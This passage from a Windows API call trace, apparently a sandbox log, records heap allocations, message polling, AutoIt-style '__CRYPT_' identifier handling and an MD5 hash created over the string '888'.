hHeap=0x970000) returned 1 [0239.477] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0239.477] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0239.477] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.477] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0239.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0239.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0239.478] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0239.478] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0239.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0239.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0239.478] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.478] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.478] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.478] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.478] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0239.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04038 | out: hHeap=0x970000) returned 1 [0239.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0239.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.479] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0239.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0239.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.479] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0239.479] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0239.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0239.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0239.480] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0239.480] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0239.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0239.480] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0239.480] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0239.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0239.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0239.481] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0239.481] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0239.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0239.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0239.481] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0239.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.482] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0239.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0239.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0239.482] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0239.482] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0239.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0239.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0239.482] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0239.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0239.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0239.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51430, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0239.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0239.483] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0239.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0239.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0239.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0239.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0239.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0239.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0239.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0239.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0239.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0239.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0239.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0239.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0239.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0239.489] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0239.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0239.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0239.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0239.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0239.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0239.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0239.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0239.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0239.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0239.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0239.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0239.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0239.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0239.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0239.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0239.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0239.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0239.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0239.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0239.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0239.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0239.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0239.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0239.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0239.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0239.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0239.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0239.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0239.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0239.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0239.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0239.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0239.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0239.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0239.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0239.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0239.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0239.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0239.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0239.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0239.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0239.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0239.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0239.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0239.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0239.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0239.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0239.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0239.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0239.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0239.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0239.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0239.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0239.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0239.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0239.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0239.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0239.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0239.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0239.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0239.494] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0239.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0239.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0239.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0239.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0239.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0239.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0239.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0239.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0239.495] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0239.495] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0239.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0239.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0239.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0239.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0239.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0239.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0239.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0239.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0239.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0239.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0239.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0239.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0239.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0239.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0239.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0239.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0239.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0239.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0239.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55058 [0239.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0239.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0239.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0239.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0239.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0239.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0239.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0239.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0239.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0239.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0239.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0239.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0239.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0239.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0239.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0239.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0239.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0239.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0239.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0239.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0239.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0239.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0239.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0239.499] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0239.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0239.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0239.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0239.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0239.499] 